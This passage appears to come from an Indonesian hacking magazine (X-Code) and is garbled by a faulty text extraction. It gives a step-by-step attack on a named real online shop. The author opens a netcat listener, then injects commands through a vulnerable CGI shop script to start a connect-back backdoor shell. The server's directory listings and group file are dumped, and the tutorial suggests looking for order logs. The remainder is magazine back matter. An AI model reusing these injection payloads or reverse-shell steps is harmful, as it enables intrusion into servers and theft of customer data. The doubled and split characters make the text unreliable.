Tampaknya file backdoor kita sudah ada tuh :D $> Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya > C: \ >ne nett cat . ex exe e - l Lvv Lvvp p 90 9000 00
Catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi komputer masing2 :D Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut $> Kita akan melakukan connectback dari server korban dengan meng-compile file backdorr tsb : ht t ps: / / www. a66. de/ cgi cgi - l oca call / sho shop. pl ?se ?seii t e=haupt sei sei t e. ht ml | PE PER RL back. t xt 61. xx xxx. x. xx xxx. x. xxx xxx 9000| &KNR= KNR=3055 3055892 892
catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port tujuan yang sudah terbuka, jika komputer kita memakai proxy atau firewall harap di konfigurasi ulang agar server korban bisa melakukan connectback terhadap kita :D
75
Bila benar maka : C: \ >ne nett cat - l Lvvp 90 9000 00 l i s ten tenii ng on [ any] 9000 . . . conne con nect ct t o [ 61 61.. xxx xxx.. xxx. xxx. xxx xxx]] f r om www. a6 a66. 6. de [ 21 213. 3. 198. 198. 17. 17. 90] 90] 1454 14542 2 ( c) Ar esU Con onne nect ct - Back B Backd ackdoo oorr Shel Shel l v1 v1.. 0 1ndone donesi si a Secu Securr i t y Te Team am ( 1st ) Li nux a66 a66.. de 2 2.. 4. 2 Fr eeB eeBSD SD 4. 7- RELEA ELEASESE- p22 #5: Tue May r oo i 386 unknown ui d=2900 290076( 76( ade00 ade001) 1) gi d=103( web) gr oups=103( web) ls back ck.. t xt f i nni s h ho or d e err . pl f ormmai l mal ay aysi si a. pl honeymoon. cf g honeymoon. pl ho hone neym ymoo oonf nf i nn nnii sho shorr de derr . pl honeym hon eymoon oonor or der . pl i kon konbo board ard or d e err . pl pr e i s e e.. pl r emvi ew. php php sh shop op.. cf g shop shop.. pl su
3 1 13: 3: 36: 49 MDT 20 2005 05
su: su: yo you u a arr e n not ot i n the co corr r ect gr oup (sys) t o su r oot.
weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super user tuh :( Mungkin kita bisa liat groupnya : https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&KNR=3055892 DI R_COLOR LORS X11 ba bashrc shrc csh. cshr c csh csh.. l og ogii n f i l esyst ems g grr ou oup p ho host st . con conff ho host st s. al l ow hos ts . deny i nf o- di r i nput rc l d. so. cach cache e l d. so. con conff l da dap_au p_autt h mast er. pa passw sswd d mhp hpop op_r _r ed edii r ect mt ab nsswi t ch. conf conf op optt pam. d p pas assw swd p prr ofi l e p prr ofi l e. d r edh edhat- r el ea ease se rpc rpmsecu rpmsecurr et t y sh she el l s ske skell ssd ssd.. at t r i b syb syb_db _dbs s t er mca cap p x xii netd. d yp.. conf yp conf ht t ps: / / www. a6 a66 6. de/ cgi cgi - l ocal ocal / sho shop p. pl ?sei t e=haup aupt sei t e. ht ml | cat / etc/ gr ou oup| p| &KNR=3055 055892 892 sys:: : 0: r oot , bi n, sys, sys sys, ad adm m, deve vell , smoc1, c1, dae aem mon, on, vb vbac acku kup ps, sa sap p, se sen nt i nel r oot: : 0: r oot da daem emon on:: : 1: r oo oott , da daem emon bi n: : 2: r oo oott , bi n, da daem emon ad adm m: : 3: r oo oott , ad adm m, dae aem mon mai l : : 4: r oo oott uu uucp cp:: : 5: uucp ucp r j e: : 8: l p: *: 9: nuucp ucp: : 10: 10: nuu nuucp us er er : : 20: f t p : : 201: ot her : : 995: guest : *: 998: post ost gr es es:: *: 70: ne new ws: *: 86: mysq ysqll : *: 88: sql sql : *: 89: st af f : : 10 100: 0: de deve vell , smoc1 syb sybase ase:: : 101: 101: syb sybase ase,, de deve vell , web ebap apps, ps, sap, sap, j koe koeche cherr , an anon onw web cl i ent : *: 102: deve vell , r oo oott , webapps, ur chi chi nd w we eb: *: 103: r oot , web eba apps nofi l es: *: 104: qmai l : *: 105: de deve vell : *: 106: 106: syb sybase ase,, hu, hu, web ebap apps, ps, sap sap,, f t p, j ko koec eche herr , an anon onw web mai l ed ed:: *: 107: 07: ba barr r yg apps: *: 108: hu, i dsuse suserr ne nett works: *: 109: squ squi d: *: 203: so soll ut i ons: *: 1025: t es estt : *: 204: dn dnsad sadm mi n: x: 50 501: 1: na nam med t sedi sedi t : *: 11 110: 0: l vance vance,, chu chuckr ckr , ed edud uda, a, gg ggarz arz a, st ev eve, e, mba ball me mai l ed edii t : *: 111: mmi nni nni g no nogroup: group: *: 65 6553 533: 3: web ebap apps: ps: *: 14 149: 9: sap: *: 19 191: 1: nobo nobody: dy: *: 6000 60001: 1: smmsp: *: 25: 25: smmsp
Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana ngerubahnya ??? sayangnya tutorial ini hanya membahas caraa kita untuk melakukan connectback menggunakan CGI BUG. Untuk lebih jelasnya silakan cari artikel ttg haldengan tsb di Google :D
76
Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya mungkin !!!???? :D (ingat site ini adalah semacam online-shop :D), silakan masukkan perintah locate order.log atau locate .log di browser anda :D hehehehehehhe Special Thanks go to : Myztx @ Myztx Soft House, Om choi @ #e-c-h-o atas tutor dan kesabarannya dalam mengajari junior mu ini :D , admin www.a66.de hehehehe jangan marah ya mas/mbak :P webnya dijadikan percobaan :D n ndak lupa juga to Spyro (the dragon??? :P) atas tempat buat artikel ini di webnya yg makin ciamik :D -------(Any Comments, Comments, Suggestions, Critics, Questions Send an Email >
[email protected])-emomelodicfre
[email protected])--------------Thanks, PusHm0v
77
Dapatkan CD Yogyafree Pro Gratis melalui distributor-distributor kami
CD Yogyafree di Komputer Redaksi (Intel Celeron D with 256 KB L2 Cache)
CD Yogyafree bersama CD-ROM tua (Desember 1995 dengan Merk GoldStar)
78
Cover belakang tempat CD Yogyafree
CD Yogyafree nampang bareng komputer tua Intel Pentium II – 300Mhz Untuk mendapatkan CD Yogyafree anda dapat menghubung menghubungii para distributor kami dengan alamat : http://www.geocities.com/family_server2/distributor.txt http://www.geocities.com/family_se rver2/distributor.txt
79
Cara menjadi penulis X-Code Magazine No 2
Isi materi yang dapat anda tulis : -
Kategori Komputer umum Kategori Pemograman Kategori Hacking Windows / Linux / FreeBSD / BeOS Etc Kategori Cracking
Kirimkan tulisan anda ke :
[email protected] - Redaksi X-Code Magazine :
[email protected] Seleksi Artikel - Artikel diseleksi, jika artikel anda sesuai dengan kriteria kami maka kami akan memasang artikel anda di X-Code Magazine. Terima kasih atas perhatiannya
80
Donasi Logo dan wallpaper oleh para X-Coders
Logo Resmi X-Code - Modifikasi ^family_code^ dari wallpaper donasi Bugscuzy
Logo lama X-Code yang dibuat oleh ^family_code^
Donasi Wallpaper oleh Bugscuzy
81
Donasi Logo oleh HKX
Donasi Wallpaper oleh Bugscuzy
82
Donasi Logo oleh nofear^71
Donasi Wallpaper oleh Bugscuzy
83
Donasi Wallpaper oleh Bugscuzy
Donasi Wallpaper oleh Bugscuzy
84
Donasi Wallpaper oleh Bugscuzy
Donasi Wallpaper oleh Bugscuzy
Donasi Logo oleh HKX
85
Donasi logo oleh w4w4n
Donasi logo oleh w4w4n
86
Donasi logo oleh w4w4n
Donasi logo oleh Genrow's
87
Donasi logo oleh ^rumput_kering^
88